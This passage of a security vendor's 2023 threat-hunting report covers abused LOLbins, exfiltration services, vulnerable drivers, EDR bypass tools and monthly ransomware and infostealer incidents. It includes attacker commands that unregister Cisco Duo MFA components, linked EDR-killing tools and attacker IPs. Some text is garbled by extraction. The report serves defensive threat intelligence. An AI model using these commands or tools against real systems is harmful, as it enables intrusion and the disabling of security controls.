make analysis difficult by obfuscating the code, help perform memory based attacks, and help achieve persistence. Often this is a precursor to launching a more traditional PE style malware attack. Top 10 non-PE file formats used maliciously in 2023 are listed below: 1. .PS (PowerShell) 2. .DOC (Word Document) 3. .JS (JavaScript) 4. .BAT (Batch File) 5. .ISO (Optical Disk Image) 6. .MSI (Windows Installer) 7. .ZIP (Winzip compressed file) 8. .RAR (WinRAR Compressed file) 9. .PDF (Adobe Portable Document Format) 10. .ONE (Microsoft OneNote) #### Most Abused File Sharing Platforms Attackers often trick organizational security programs by exfiltrating user data into legitimate file sharing platforms to stay under the radar. The Top 10 file sharing platforms we saw abused by attackers in 2023 were: 1. Mega cloud 2. Telegram 3. Discord 4. Dropbox 5. Pastebin 6. Ghostbin 7. Transfer.sh 8. FileTransfer.io 9. Wetransfer.com 10. Sendspace.com ----- #### Most Abused LOLbins [Attackers often force otherwise legitimate applications to do bad things. Examples include: arbitrary](https://github.com/LOLBAS-Project/LOLBAS#criteria) code execution, download, upload, execute, credential dump, and DLL side loading. All are categorized as LOLbin (Living Off the Land Binaries) for WatchTower threat hunters. Below are the top LOLbins abused in 2023. PowerShell cmd WMI Wmic Psexec Esenutil Ssh Curl Rundll32 Regsvr32.exe Sc.exe Msiexec.exe Msconfig.exe Certutil.exe At.exe wget Netsh.exe mshta.exe Bitsadmin.exe Msbuild.exe Cscript.exe Expand.exe Reg.exe dllhost.exe ----- #### Most Used Cross-Platform Programming Languages for Malware Attackers' use of cross-platform programming languages to code their payloads to target different platforms (Windows, Linux, OSX, ChromeOS) exploded in 2023. The table below lists the threat groups and payload names most seen in 2023. ----- #### DLL Side-Loading Attacks Remain a Favorite in 2023 According to [MITRE, adversaries may execute their own malicious payloads by side-loading DLL's.](https://attack.mitre.org/techniques/T1574/002/) Similar to DLL Search Order Hijacking, side-loading involves hijacking which DLL a program loads. Rather than just planting the DLL within the search order of a program and waiting for a user to load the targeted application, adversaries may directly side-load their payloads by planting and invoking a legitimate application that executes their payload(s). WatchTower studied the following groups and malware families in 2023 which used DLL side-loading. ----- #### Top Vulnerable Drivers Targeted by Attackers Attackers are known to use drivers to disable security settings of endpoints to cause maximum damage. Below are the top driver files and the respective threat groups abusing them, as seen in our 2023 investigations. **Threat Group/Framework** **Driver file** **Application Name** UNC3944 - iqvw64.sys - Intel Network Adapter Diagnostic Driver Sliver - mhyprot2.sys - Genshin Impact Blackbyte - rtcore64.sys - Micro-Star MSI AfterBurner - dbutil_2_3.sys - Dell North Korea's APT UNC2970 - ene.sys - RGB lighting control APT Earth Longzhi - terminator (zamguard64.sys or - Zemana Anti-Malware zam64.sys) BlackCat Ransomware - Ktgn.sys - Zemana Anti-Malware - zamguard64.sys/zam64.sys Multiple ransomware groups - procexp.sys - ProcessExplorer Agonizing Serpens - rentdrv2.sys - Rentdrv2 Driver #### EDR Bypass Tools and Techniques in 2023 Modern EDR technology is the most effective method to prevent successful malware execution. As a result,attackers frequently attempt to use EDR bypass tools to shut them down and avoid detection while carrying out malicious activities. Often, this leaves victims to identify these mechanisms only after the damage is done. Below are the top 5 EDR bypass tools and techniques WatchTower observed in 2023: **Critically, SentinelOne employs the most robust tamper protection techniques in the industry and** **is not susceptible to any of these techniques.** 1. [Mhydeath, EDRSandBlast - Uses a vulnerable driver for killing EDR processes.](https://github.com/zer0condition/mhydeath) 2. [Chimera - DLL sideloader.](https://github.com/georgesotiriadis/Chimera) 3. [RealBlindingEDR - Uses vulnerable drivers to remove kernel callbacks.](https://github.com/myzxcg/RealBlindingEDR) 4. [BadRentdrv2 - A vulnerable driver capable of terminating several EDRs and antivirus tools,](https://github.com/keowu/BadRentdrv2/blob/main/README.md) rendering them ineffective. Works for both x32 and x64 platforms. 5. [Mhyprot2DrvControl - A library that allows using the mhyprot2 driver, mhyprot2.Sys, to enumerate](https://github.com/kagurazakasanae/Mhyprot2DrvControl) process modules, r/w process memory, and kill processes. ----- g g yp q Tartarus - TpAllocInject, used for bypassing user level hooks. Unwinder - Used for call stack spoofing based on rust programming language. UnhookingPatch - Used for patching NT API stub at runtime. HellsHall - Used for performing indirect syscalls. KILLER TOOL - Performs multiple activities like Unhooking, and module stomping for EDR evasion NTDLLReflection - Loads NTDLL from remote server reflectively to bypass userland hooks SentinelOne Singularity's tamper protection ensures that SentinelOne agents are not impacted by any of the attacks listed above. #### 2023 Infostealer Ecosystem Overview [In February 2022, Microsoft announced plans to disable macros by default to stop threat actors from](https://techcrunch.com/2022/07/22/microsoft-office-macros-blocked-default/) abusing the feature by delivering malware via email attachments. Before long, cyber criminals started searching for other ways to deliver their loaders and malware. Thus, they adopted OneNote in their campaigns to deliver AsyncRAT, AgentTesla, DoubleBack, NetWire RAT, RedLine, Quasar RAT, XWorm, and Formbook as far back as March 2023. Some of the file types seen used in these campaigns include .one, .chm, .HTA, .js, vbs, wsf, bat and .ps. In May 2023, researchers spotted a new loader named Pikabot, which shared several similarities to Qakbot loaders. The FBI announced the take down of the massive Qakbot botnet through an operation codenamed ["Operation Duckhunt" in late August.](https://youtu.be/mIeUT0QmqfU) ----- ###### 2023 Commodity and Malware Loaders Timeline Late 2022 - early 2023 Criminals adopted OneNote for infection vector JUN 2023 AUG 2023 OCT 2023 DEC 2023 Following the Qakbot takedown in August 2023, WatchTower hunters saw a spike in DarkLoader campaigns, and digitally signed infostealer campaigns that delivered the Parallax RAT, Vidar stealer, ClearFake, RedLine, Enosch, the Lumma infostealer and the Raccoon infostealer in September. Around the same time, we also saw threat actors using the IDAT loader to deliver RedLine, Vidar, Amadey, LummaStealer, Danabot and Raccoon stealer. In mid-December, researchers spotted a small set of Qakbot samples in the wild, notably connecting to C2 infrastructure that used the same JARM fingerprint as earlier Qakbot and Pikabot samples. Other main loaders and malware seen in 2023 that showed no signs of slowing down include IcedID, Ursnif, SolarMarker, SocGholish, and Raspberry Robin. MAY 2023 SEP 2023 JUL 2022 ----- #### Top Stories from 2023 ###### January 2023: IceFire Ransomware Abuses IBM Aspera Faspex Vulnerability In early 2023, WatchTower saw threat actors deploying new Linux variants of IceFire ransomware during intrusions of enterprise networks. These cyber criminals targeted several organizations in the global media and entertainment sectors. Attackers deployed IceFire by exploiting CVE-2022-47986, a deserialization vulnerability in IBM's Aspera Faspex file sharing software. While IceFire's operators previously only targeted Windows environments, they have expanded their scope to include Linux. This strategic shift is a significant move [that aligns them with other ransomware groups who also target Linux systems. According to Shodan,](https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/) over 150 Aspera Faspex servers are exposed online, primarily based in the United States and China. In a joint Vigilance-WatchTower investigation shown below, the attacker downloads payloads from the URL shown below named iFire and Demo via the application's Ruby process, which saves itself to execute the payloads later. FIG: Payload Download FIG: Payload Execution ----- FIG: Snippet of Reconnaissance Activity p, y p Before establishing a reverse shell, the attacker tries to create a backdoor and install the IceFire ransomware payload. On execution, the threat actor's command establishes and completes the reverse shell by connecting to the IP address "140.82.45.172". Once an attacker establishes the reverse shell, they can perform reconnaissance activity, as shown below: They can also execute the IceFire payload from the reverse shell. WatchTower has attached IceFire's ransom note below for reference. [SentinelOne Singularity detects and mitigates IceFire activity, as shown in the following video demo.](https://www.youtube.com/watch?v=Gs6R-TZ3JIg) ----- ###### February 2023: Multi-Stage MacOS Crypto Miner Spreads Via Pirated Software On 22 February 2023, Apple released an update to XProtect, its internal YARA-based malware file blocking service. Version 2166 added several new signatures for a threat labeled "Honkbox", a cryptominer characterized by its use of XMRig and the "Invisible Internet Project,'' also known as I2P. WatchTower observed a MacOS cryptominer named Honkbox delivered through pirated software. The payload is a XMRig miner and uses Invisible Internet Protocol (I2P) network tooling for communication. Honkbox has at least three variants and uses multiple components, including some undocumented ones. The malware is distributed through the Pirate Bay. Many samples originate from trojanized versions of Logic Pro. However, threat actors have abused other popular creative applications, including Adobe Zii, Photoshop, Illustrator, and Ableton Live. When executed, the trojanized application decodes Base64 blobs. One corresponds to the legitimate video editing Final Cut Pro. This file is launched and is indistinguishable from the original software to the user. The other blobs are the I2P demon and XMRig miner. The images below show the shell script responsible for deploying the payloads. ----- g y p g watch a demo where the Singularity Platform autonomously mitigates this attack. ###### March 2023: Threat Actors Launch First Double Supply Chain Attack Against 3CX Since the historic SolarWinds breach in 2020, which impacted thousands of organizations, supply chain attacks have become a major concern for organizations due to the catastrophic damage they can [cause. In late March 2023, SentinelOne researchers uncovered a supply chain attack against 3CX, a](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068690000102786AAA) VoIP communication company with over 12 million daily users. During this devastating attack, threat actors trojanized the 3CXDesktopApp to infect thousands of users worldwide. This attack compromised the 3CXDesktop App's supply chain across Windows and macOS installers. When a user installed the application, a trojanized library was sideloaded and connected to a Command and Control Server. After fingerprinting the environment, researchers observed the library downloading an infostealer payload capable of gathering information on the system, as well as browser data from the Google Chrome, Microsoft Edge, Mozilla Firefox, and Brave browsers. In some cases, the threat actors used this backdoor to perform cyber espionage. Researchers would go on to discover that this was the first "double supply chain attack," as 3CX's vulnerability led to a supply chain attack, while 3CX itself was a victim of a supply chain attack. ###### Windows Attack Overview The trojanized MSI installer sideloads ffmpeg.dll, which decrypts a payload stored in d3dcompile.dll. The attacker used SigFlip to insert the payload into d3dcompile.dll without breaking the existing Authenticode signature. The decrypted payload is a shellcode responsible for launching the DLL payload (SuddenICON). Next, it downloads C2 URLs, steganographically stored in icon files, to download the final IconicStealer payload, which exfiltrates browser data. 3CXDesktopApp.exe SUDDENICON Shellcode Iconic Stealer ----- ###### Mac Attack Overview For Apple Mac environments, the 3CX desktop application loads a dynamic library file named libffmpeg dylib. The malicious code in dylib is present in init func, which runs before the main function. It acts as the downloader for the next stage payload, named UpdateAgent which performs reconnaissance, collects some information from the host, and sends it to a C2 server. In some cases, researchers observed threat actors using a backdoor capable of collecting system information and executing commands. Electron Dylib 3CX Desktop App Framework Hijacking libffmpeg.dylib Downloads UpdateAgent (Second Stage Backdoor Payload) ###### Double Supply Chain Attack Due to the two linked supply chain attacks involving 3CX, cybersecurity experts believe this attack could be classified as a double supply chain attack. According to researchers from Mandiant, 3CX was impacted by a supply chain attack against Trading Technologies. During this attack, threat actors exploited a backdoor in the firm's X_TRADER software, impacting 3CX and several other victims. The attacker moved laterally and compromised both Windows and macOS environments. Researchers identified several similarities in the X_TRADER and 3CXDesktopApp attacks, including similar techniques, such as the use of sigloader, sigflip, and shellcode, as well as the use of an identical RC4 key and AES-256 encryption scheme. 3CX Desktop Sofware Victims Electron Framework Threat Actor 3CX Desktop App UpdateAgent (Second Stage Payload) ----- pp y **DLL side-loading** **Use of the SideFlip loader** **Use of the AES-256 GCM algorithm** **Use of the same RC4 key** **Similar C2 URL parameters** ###### April 2023: PaperCut Vulnerability Heavily Targeted the Education Sector [On 19 April 2023, the print management firm PaperCut disclosed that they had received third-party](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219) alerts regarding vulnerability exploitation on unpatched servers. The Zero-Day Initiative has tagged these threats as [ZDI-CAN-19226 (CVE-2023-27351) and](https://www.zerodayinitiative.com/advisories/ZDI-23-232/) [ZDI-CAN-18987 (CVE-2023-27350).](https://www.zerodayinitiative.com/advisories/ZDI-23-233/) Vigilance identified threat actors actively exploiting a PaperCut print server and attempting to drop remote access software on several organizations from a recently registered infrastructure domain. Our researchers noticed and blocked this intrusion attempt in its early stages. However, due to how quickly SentinelOne blocked this attack, we have less information regarding the later stages of this attack kill chain and the threat actors' objectives. Researchers identified a suspicious PowerShell command originating from an exploited PaperCut MF process, prompting Vigilance and WatchTower to seek additional information. The number of Shodan search query results looking for PaperCut in HTML using the default 9191 listening port are listed below. ----- ###### May 2023: Chinese APT Targeting Government Officials [Following a G7 meeting in May 2023 where the leaders of Japan, Australia, Brazil, Canada, Comoros,](https://www.whitehouse.gov/briefing-room/statements-releases/2023/05/20/hiroshima-action-statement-for-resilient-global-food-security/) the Cook Islands, France, Germany, India, Indonesia, Italy, the Republic of Korea, the United Kingdom, the United States of America, Vietnam, and the European Union met to discuss global food security and the risks of famine, WatchTower observed threat actors using this meeting to distribute lure documents disguised as action steps and information from Indonesian government officials. These Rich Text Format (RTF) files exploit CVE-2017-11882. WatchTower hunters successfully matched this file, named "[FINAL] Hiroshima Action Statement for Resilient Global Food Security_ [trackchanged.docx" to another document found here.](https://www.ft.dk/samling/20222/almdel/UPN/bilag/89/2713030.pdf) [CVE-2017-11882 is a 17-year-old memory corruption issue in Microsoft Office (including Office 365).](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882) When exploited successfully, it lets attackers execute remote code in a vulnerable environment. This attacker uses a builder tool named RoyalRoad, which several Chinese APT groups previously used to poison Microsoft Office files to target government officials in 2017. WatchTower saw malicious documents using the CVE-2017-11882 vulnerability throughout 2023. 4800 2500 2000 1900 1400 1200 ----- g g gii, Kingdom, India, Singapore, and Australia. The email's author claimed to be part of Indonesia's Ministries of Foreign and Economic Affairs. The document attached to this email claims to be a series of action statements from the recent G7 meeting in Hiroshima, Japan, regarding "global food security." The document also specifically refers to security issues surrounding the South China Sea. Chinese APT groups have previously used this sensitive political issue against targets within South Asian governments and government-affiliated entities, as shown in the following screenshots: WatchTower reviewed this malicious document and confirmed that it drops an infostealer that connects back to a C2 server. ----- ###### June 2023: Cl0p Exploits MoveIT Vulnerability Globally [WatchTower hunters identified multiple threat actors exploiting a critical vulnerability involving a SQL](https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023) [injection flaw in the managed file transfer solution MOVEit Transfer. MOVEit Transfer allows enterprises](https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/) to securely transfer files between business partners and customers using SFTP, SCP, and HTTP-based uploads. A recent advisory from 31 May 2023 warned that attackers can leverage this SQL injection vulnerability to gain escalated privileges and gain unauthorized access. **About 2,620 organizations and 77.2 million people have been impacted by the hacking of** **fle transfer service MOVEit since May, according to Emsisofti** WatchTower has observed Cl0p previously targeting the following file transfer vulnerabilities: Accellion FTA (CVE-2021-27101 CVE-2021-27102, CVE-2021-27103 (SSRF), and CVE-202127104) from late 2020 to early 2021. SolarWinds Serv-U (CVE-2021-35211) in late 2021. GoAnywhere (CVE-2023-0669) in early 2023. The PaperCut vulnerability (CVE-2023-27350 and CVE-2023-27351) in early 2023. For more [information, please refer to our previous flash report coverage here.](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068690000119Py0AAE) [The MOVEit vulnerability (CVE-2023-34362) and another RCE vulnerability that security](https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability) researchers are reviewing. For more information, please refer to our flash reports in Community portal. All MOVEit Transfer customers must apply new patches from 2023 June 9, as advised [here. Cl0p is known to specifically target vulnerabilities in FTA applications. Reports indicate](https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability) this gang has earned over $75 million from MOVEit extortion attacks. This zero-day vulnerability could allow attackers to escalate privileges and access an environment. The attack impacted organizations in the following sectors: **Print & Digital** **Media** **Transportation** **& Logistics** **Building** **Materials** ----- , y g Key general statistics from Censys about the different service providers and host locations can be found below. Threat actors almost exclusively use this vulnerability in the United States, with only a few hundred other hosts exposed in other countries. A list of vulnerable MOVEit Transfer versions is attached below for reference: ----- ###### July 2023: Spike in Mallox Targeting MS-SQL In 2023, WatchTower hunters investigated and tracked over seven Mallox intrusions. In these instances, we observed the following kill chain: The threat actor exploits a SQL server to get a shell. They download additional PowerShell scripts. This PowerShell script downloads an MSI file (PurpleFox) PurpleFox establishes persistence and attempts privilege escalation. WatchTower observed malicious and obfuscated PowerShell command lines originating from the SQL server post-compromise. Next, the threat actor downloads malicious payloads from the remote server. In some cases, WatchTower hunters saw PurpleFox download additional files from a remote C2. From our multiple Mallox incident investigations, we observed Mallox ransomware operators gaining access to an endpoint that was not managed or protected by SentinelOne, and deploying an encryptor payload. In one instance, we observed PurpleFox dropping multiple malicious payloads into the SQLserver temporary directory, named BadPotato, three payloads named SweetPotato, and NtApiDotNet. FIG: SQL Server Exploitation and Additional File Downloads ----- FIG: WMIC Commands and PowerShell Execution For more information, WatchTower customers can refer to our previous flash reports in Community Portal on the seven incidents where Mallox exploited MS-SQL: Mallox Ransomware-as-a-Service Updates Mallox Ransomware Distributed Via MS-SQL Four Mallox Intrusion Attempts Detected in Late August Mallox Ransomware Continues to Abuse MS-SQL Servers. ----- FIG: Quick Mallox Ransomware Attack Breakdown ###### August 2023: Akira Abuses Cisco ASA VPN Vulnerability To Achieve Initial Access SentinelOne WatchTower was the first threat hunting team to identify and investigate Akira ransomware's exploitation of a Cisco VPN gateway vulnerability. While SentinelOne Singularity autonomously detected and prevented lateral movement attempts, WatchTower hunters quickly discovered the ransomware operators' initial access techniques through common traits observed from the Akira leak site, [and shared their findings with other researchers. Cisco fixed the bug and reported on the vulnerability](https://www.bleepingcomputer.com/news/security/akira-ransomware-targets-cisco-vpns-to-breach-organizations/) in August 2023. ----- , g p ###### September 2023: IDAT Loader Delivers Multiple Infostealers WatchTower hunters observed threat actors rapidly adopting the IDAT malware loader in their cam[paigns in mid-to-late 2023. The IDAT loader is programmed to support evasion techniques like pro-](https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/) cess doppelgänging, DLL search order hijacking, and Heaven's Gate. Researchers have named this loader after its signature technique, where a threat actor will store the malicious payload in the IDAT chunk of a PNG file. A new heap section is created using malloc, and the PNG data is copied into the heap using Win``` HttpReadData. The compressed data is decrypted and passed as an argument to the RtlDecompressData API. The decompressed data holds the executable it needs to inject the shellcode into ``` and the DLL. FIG: PNG Containing Malicious IDAT ----- FIG: Decompressed Data Containing Shellcode WatchTower has identified multiple stealers using both IDAT loader variants in their operations. Specifically, WatchTower has identified Vidar and Lumma operators using the first variant, where threat actors use a C2 to download PNG files with a malicious IDAT section. Amadey and Raccoon operators use a second variant that shares similarities. However, Vidar, Lumma, Amadey, StealC, Danabot and Raccoon operators all decompress data and inject shellcode. ###### October 2023: TellYouThePass Exploits Apache ActiveMQ Vulnerability (CVE-2023-46604) On Oct 27, 2023, WatchTower hunters observed a remote code execution in Apache ActiveMQ to target both Windows and Linux endpoints leading to TellyouThePass ransomware infection from a remote IP 172.245.16.125. TellYouThePass is a ransomware family first sighted in early 2019. Threat actors primarily distribute the malware through phishing emails, malicious attachments, or compromised websites. These at[tackers also commonly exploit CVE-2021-44228, the Log4Shell vulnerability, to carry out their attacks.](https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html) TellYouThePass ransomware employs robust encryption techniques, including AES-256 and RSA1024, to encrypt both server and user data. WatchTower has observed TellYouThePass Ransomware targeting [both Windows and Linux environ-](https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-revived-in-linux-windows-log4j-attacks/) [ments. Despite differences between the two variants and uncommon features, the Windows and Linux](https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-revived-in-linux-windows-log4j-attacks/) variants use the same ransom note and file extension, indicating they belong to the same malware family. WatchTower hunters believe threat actors exploited this service using a WSO2 arbitrary file upload [vulnerability discussed in a report from InfoSecMatter utilizing the Metasploit framework. In this case,](https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/wso2_file_upload_rce) this allowed threat actors to drop and execute a Linux ransomware variant. For more information, WatchTower customers can refer to our flash report in Community Portal. ----- ###### November 2023: NoEscape/Avaddon Operators Disable Cisco Duo - Hunting for Patient Records WatchTower identified the first NoEscape variant in May 2023, and issued a report identifying it as an Avaddon ransomware variant. These attacks spiked in November when Vigilance DFIR analysts identified threat actors targeting a health organization using multiple Cisco vulnerabilities to achieve initial access. NoEscape used Advanced IPScanner for reconnaissance. WatchTower observed these threat actors using randomly named executables, posing as services sourced from a temp directory within the Windows directory on the operating system partition for persistence. Attackers used NETMongoose and PsMapExec from GitHub repositories, using them to dump credentials for domain admin users and then using Rclone for data exfiltration. ###### NoEscape Attackers Look for Hospital Records WatchTower observed NoEscape operators checking for specific file names related to "death","accident", "litigation", "died", "died or problem" and "NDA". **[Why do attackers target hospitals?](https://www.sentinelone.com/blog/healthcare-and-cybersecurity-in-the-time-of-covid-19/)** Hospitals' IT infrastructure are big, complex and frequently outdated. Healthcare institutes work with a multitude of third party vendors (such as suppliers, service providers, state and federal agencies, universities and NGOs). Healthcare organizations frequently have issues with overextended staff and a weak security culture. Hospitals and care facilities were forced to implement remote monitoring technologies overnight. Hospital services cannot halt due to the risk it may bring to human lives. Compliance issues with leaked data. Health records can be used for blackmail and additional attacks. ###### NoEscape Operators Disable Cisco Duo The threat actors executed commands to disable Cisco Duo, a multi-factor authentication (MFA) solution. ``` cmd /c regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll" cmd /c regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll" ``` ###### NoEscape Actors Approached by LockBit [Researchers notified the cybersecurity community that the LockBit ransomware operation is now recruiting](https://twitter.com/azalsecurity/status/1734030086183993664) affiliates and developers from BlackCat/ALPHV and NoEscape after recent disruptions and exit scams. ----- Ransomware affiliate exit scams frequently attract complaints on all major hacking forums. They appear to be banned on XSS and Exploit at the moment, which will likely lead to NoEscape shutting down and potentially rebranding in the future. ###### December 2023: ALPHV Continues Intimidation ALPHV (also known as BlackCat) was one of the most active threat groups throughout 2023, carry[ing out multiple high-profile attacks. ALPHV/Blackcat affiliates use advanced social engineering tech-](https://www.ic3.gov/Media/News/2023/231219.pdf) niques and open source research on a company to gain initial access. Actors pose as company IT and/or help desk staff and use phone calls or SMS messages to obtain credentials from employees to access the target network. ALPHV/Blackcat affiliates use uniform resource locators (URLs) to live-chat with victims to convey demands and initiate processes to restore the victims' encrypted files. ----- , p g disruption campaign against the ransomware group known as ALPHV, Noberus, or BlackCat, that resulted in the seizure of several of the group's websites. After a few hours, the group claimed they had unseized their website. Researchers are aware that this group attempts to disable or uninstall any security services they encounter after achieving network access. ALPHV continues to be active at the point of this report's publishing, with observed December 2023 ransomware attacks against specific targets of their choice after gaining access. ALPHV is known to use intimidating comments and passwords post compromise as the one shown here: "C:\7zr.exe" x c:\lockthis.zip -pTryAndDecryptMe1337420! -oC:\ SentinelOne is closely tracking this attacker group and shall continue to support joint operations with other security groups. ----- #### About WatchTower WatchTower is SentinelOne’s threat hunting service, provided as a value-added benefit for Vigilance Respond and Vigilance Respond Pro customers. This service leverages SentinelOne’s cyber threat intelligence experts, dedicated hunters, and investigators to identify new and innovative threat campaigns launched by cybercriminal and nation-state threat actors from across the globe. Our team analyzes the threats, determines TTPs (Tactics, Techniques, Procedures), creates and launches hunting methodologies, and investigates findings on behalf of our customers. We know that threat actors are well-funded, highly intelligent, and persistent in devising new and innovative ways to penetrate computer networks. Additionally, we recognize that misplaced exclusions, unprotected endpoints, and end-of-life agent versions can potentially create vulnerabilities for attackers to leverage. For these reasons, we believe that a proactive approach to our customer’s security—including threat hunting—is vital to a well-rounded MDR security program. ###### How it Works The WatchTower hunting approach targets emerging threats identified by our threat intelligence team. We are constantly identifying new attacker TTPs and searching for their existence within Vigilance customer environments, across trillions of file and network events, registry changes, scheduled tasks, running processes, and logins. ###### About SentinelOne SentinelOne (NYSE:S) is pioneering autonomous cybersecurity to prevent, detect, and respond to cyber attacks faster and with higher accuracy than ever before. Our Singularity XDR platform protects and empowers leading global enterprises with real-time visibility into attack surfaces, cross-platform correlation, and AI-powered response. Achieve more capability with less complexity. ----- ## Contact us ###### sales@sentinelone.com +1-855-868-3733 sentinelone.com S1_WATCHTOWER_EOY2023_01172024 © SentinelOne 2024 -----